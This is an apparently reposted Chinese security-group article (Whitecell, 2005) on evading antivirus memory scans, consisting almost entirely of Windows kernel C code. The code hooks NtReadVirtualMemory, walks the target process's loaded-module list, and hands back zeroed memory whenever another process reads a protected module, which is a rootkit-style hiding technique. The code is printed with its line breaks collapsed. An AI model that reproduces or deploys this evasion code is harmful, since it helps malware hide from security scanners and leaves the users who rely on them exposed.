快捷導(dǎo)航

對(duì)抗殺毒軟件的內(nèi)存掃描

更新時(shí)間：2007年01月16日 00:00:00 作者：

Author:  Polymorphours
Email:   Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:    2005-11-17

/*++        Author: PolymorphoursDate: 2005/1/10通過對(duì) NtReadVirtualMemory 掛鉤，防止其他進(jìn)程對(duì)保護(hù)的模塊進(jìn)行掃描，如果發(fā)現(xiàn)其他進(jìn)程讀被保護(hù)模塊的內(nèi)存，則返回0--*/typedef struct _LDR_DATA_TABLE_ENTRY {LIST_ENTRY InLoadOrderLinks;LIST_ENTRY InMemoryOrderLinks;LIST_ENTRY InInitializationOrderLinks;PVOID DllBase;PVOID EntryPoint;ULONG SizeOfImage;UNICODE_STRING FullDllName;UNICODE_STRING BaseDllName;/*+0x034 Flags            : Uint4B+0x038 LoadCount        : Uint2B+0x03a TlsIndex         : Uint2B+0x03c HashLinks        : _LIST_ENTRY+0x03c SectionPointer   : Ptr32 Void+0x040 CheckSum         : Uint4B+0x044 TimeDateStamp    : Uint4B+0x044 LoadedImports    : Ptr32 Void+0x048 EntryPointActivationContext : Ptr32 Void+0x04c PatchInformation : Ptr32 Void*/} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;/*++函數(shù)名: MyNtReadVirtualMemory參數(shù):INHANDLEProcessHandle,INPVOIDBaseAddress,OUTPVOIDBuffer,INULONGBufferLength,OUTPULONGReturnLengthOPTIONAL功能：隱藏保護(hù)模塊的內(nèi)存,如果發(fā)現(xiàn)有內(nèi)存掃描到這塊內(nèi)存，則返回加密后的數(shù)據(jù)擾亂掃描過程返回:NTSTATUS--*/NTSTATUSMyNtReadVirtualMemory(INHANDLEProcessHandle,INPVOIDBaseAddress,OUTPVOIDBuffer,INULONGBufferLength,OUTPULONGReturnLengthOPTIONAL){NTSTATUSstatus;PEPROCESSeProcess;PVOIDPeb;PPEB_LDR_DATAPebLdrData;PLDR_DATA_TABLE_ENTRYLdrDataTableHeadList;PLDR_DATA_TABLE_ENTRYLdrDataTableEntry;PLIST_ENTRYBlink;PPROTECT_NODEFileNode = NULL;BOOLEANbHideFlag = FALSE;ULONGImageMaxAddress = 0;/*#ifdef _DEBUGDbgPrint( "Call Process: %s, BaseAddress: %08x\n", PsGetProcessImageFileName(
PsGetCurrentProcess() ), BaseAddress );#endif*/status =ObReferenceObjectByHandle(ProcessHandle,FILE_READ_DATA,PsProcessType,KernelMode,(PVOID)&eProcess,NULL);if ( NT_SUCCESS(status) ) {//// 得到PEB的地址//Peb = (PVOID)(*(PULONG)((PCHAR)eProcess + PebOffset));//// 切換到目標(biāo)進(jìn)程空間//KeAttachProcess( eProcess );//// 判斷PEB是否有效，如果有效，那么準(zhǔn)備利用PEB結(jié)構(gòu)遍歷進(jìn)程加載的模塊//if ( !MmIsAddressValid( Peb ) ) {/*#ifdef _DEBUGDbgPrint( "PEB is error.\n" );#endif*/KeDetachProcess();ObDereferenceObject( eProcess );goto CLEANUP;}PebLdrData = (PPEB_LDR_DATA)(*(PULONG)( (PCHAR)Peb + 0xc ));if ( !PebLdrData ) {KeDetachProcess();ObDereferenceObject( eProcess );goto CLEANUP;}try {ProbeForRead ( PebLdrData,sizeof(PEB_LDR_DATA),sizeof(ULONG));//// 遍歷模塊鏈表//LdrDataTableHeadList = (PLDR_DATA_TABLE_ENTRY)PebLdrData
->InLoadOrderModuleList.Flink;LdrDataTableEntry = LdrDataTableHeadList;do {ProbeForRead(LdrDataTableEntry,sizeof(LDR_DATA_TABLE_ENTRY),sizeof(ULONG));if ( !LdrDataTableEntry->DllBase ) {LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry
->InLoadOrderLinks.Flink;continue;}//// 判斷讀的內(nèi)存屬于那一個(gè)模塊，如果都不屬于，那么放過//ImageMaxAddress = (ULONG)((ULONG)LdrDataTableEntry->DllBase +
LdrDataTableEntry->SizeOfImage);if ( (ULONG)( (ULONG)BaseAddress + BufferLength) <
(ULONG)LdrDataTableEntry->DllBase || (ULONG)BaseAddress > ImageMaxAddress ) { // // 如果不是讀模塊區(qū)域，那么枚舉下一個(gè) //LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->
InLoadOrderLinks.Flink;continue;}//// 如果是被保護(hù)的模塊，那么返回虛假數(shù)據(jù)//bHideFlag = FALSE;Blink = ProtectFile.Blink;while ( Blink != &ProtectFile ) {FileNode = CONTAINING_RECORD( Blink, PROTECT_NODE, ActiveLink );//// 如果發(fā)現(xiàn)當(dāng)前文件存在于隱藏列表，那么設(shè)置隱藏標(biāo)志隱藏它//if ( wcsstr( FileNode->ProtectName, Ldr
DataTableEntry->FullDllName.Buffer ) ) {bHideFlag = TRUE;break;}Blink = Blink->Blink;}if ( bHideFlag ) {//// 返回原本的進(jìn)程空間進(jìn)行處理//KeDetachProcess();ObDereferenceObject( eProcess );ProbeForWrite(Buffer,BufferLength,sizeof(ULONG));memset( Buffer, 0x00, BufferLength );ProbeForWrite(ReturnLength,sizeof(PULONG),sizeof(ULONG));*ReturnLength = BufferLength;return STATUS_SUCCESS;}LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry
->InLoadOrderLinks.Flink;} while ( LdrDataTableEntry != LdrDataTableHeadList );} except( EXCEPTION_EXECUTE_HANDLER ) {if ( !bHideFlag ) {KeDetachProcess();ObDereferenceObject( eProcess );}goto CLEANUP;}KeDetachProcess();ObDereferenceObject( eProcess );}CLEANUP:return NtReadVirtualMemory(ProcessHandle,BaseAddress,Buffer,BufferLength,ReturnLength);}

WSS(Whitecell Security Systems)，一個(gè)非營利性民間技術(shù)組織，致力于各種系統(tǒng)安全技術(shù)的研究。堅(jiān)持傳統(tǒng)的hacker精神，追求技術(shù)的精純。
WSS 主頁：http://www.whitecell.org/
WSS 論壇：http://www.whitecell.org/forums/